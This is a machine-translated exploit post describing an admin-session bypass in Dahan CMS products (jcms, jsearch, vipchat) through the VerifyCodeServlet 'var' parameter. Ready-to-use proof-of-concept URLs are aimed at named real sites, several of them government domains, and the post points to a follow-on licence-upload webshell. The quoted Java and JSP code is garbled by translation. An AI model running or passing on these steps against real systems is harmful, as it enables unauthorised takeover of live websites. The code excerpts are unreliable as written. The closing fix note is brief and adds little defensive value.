Dahan network kills all systems and versions on 0day

Dahan network kills all systems and versions on 0day

Management Background Permission Bypass, easy GetShell after entering the background,
Experience proves to kill all systems and versions, including jcms, jact, jsearch, vipchat, vc, and xxgk.
I guess this is the most influential vulnerability in Dahan. Please try again!

Session Permission Bypass in the Setup directory:
 

Code Analysis/jcms/setup/opr_licenceinfo.jsp: // obtain the value of cookie_username in the Session and assign it to strUser String strUser = (String) sessions. getAttribute ("cookie_username"); // determines whether the strUser value is null? If (strUser = null | strUser. trim (). length () = 0) {out. println ('log on first! ') Return;} // if it is null, It is not logged on. return directly // if it is not null, it indicates it has been logged on

Reverse java servlet code/VerifyCodeServlet
 

// Obtain the request parameter var and assign it to strVar String strVar = Convert. getParameter (request, "var", ""); if (strVar = null) {request. getSession (). setAttribute ("COMPLAT", str_code); // Save the random code to the SESSION} else {// If strVar is not empty, create a request for the SESSION value named strVar. getSession (). setAttribute (strVar, str_code); // Save the random code to the SESSION}. Therefore, you can control the creation of the SESSION name through the var parameter.

Through the analysis of two programs, sort out:

1. opr_licenceinfo.jsp requires a SESSION cookie_username not empty to successfully log on.

2./VerifyCodeServlet can create any SESSION key value

Therefore, in combination, you can construct a successful logon.

Log on to opr_licenceinfo.jsp directly.

Http://www.zgzhijiang.gov.cn/jcms/setup/opr_licenceinfo.jsp
 

Add a Session value cookie_username

Http://www.zgzhijiang.gov.cn/jcms/VerifyCodeServlet? Var = cookie_username
 

Access/jcms/setup/opr_licenceinfo.jsp again and log on successfully.
 

Licence File Upload webshell vulnerability, do not demonstrate, refer to: http://wooyun.org/bugs/wooyun-2010-052699

POC chat POC:

Http://sdds.gov.cn/vipchat/setup/

Http://sdds.gov.cn/vipchat/VerifyCodeServlet? Var = cookie_username

Http://sdds.gov.cn/vipchat/setup/admin.jsp
 

Jsearch POC:

Http://www.hyhjbh.com/jsearch/setup/

Http://www.hyhjbh.com/jsearch/VerifyCodeServlet? Var = cookie_username

Http://www.hyhjbh.com/jsearch/setup/opr_licenceinfo.jsp
 

Other Chinese systems are not listed one by one,

This is a logic vulnerability of the VerifyCodeServlet component,

All systems of Dahan include VerifyCodeServlet, which is used to generate verification codes,

Therefore, all systems are blocked and the impact scope is very wide.

Note:

1. Some sites access the setup directory, and 403 is returned. Access is forbidden.

2. The new Chinese Version 2015 will not be affected.
 

Solution:

Fix VerifyCodeServlet component logic.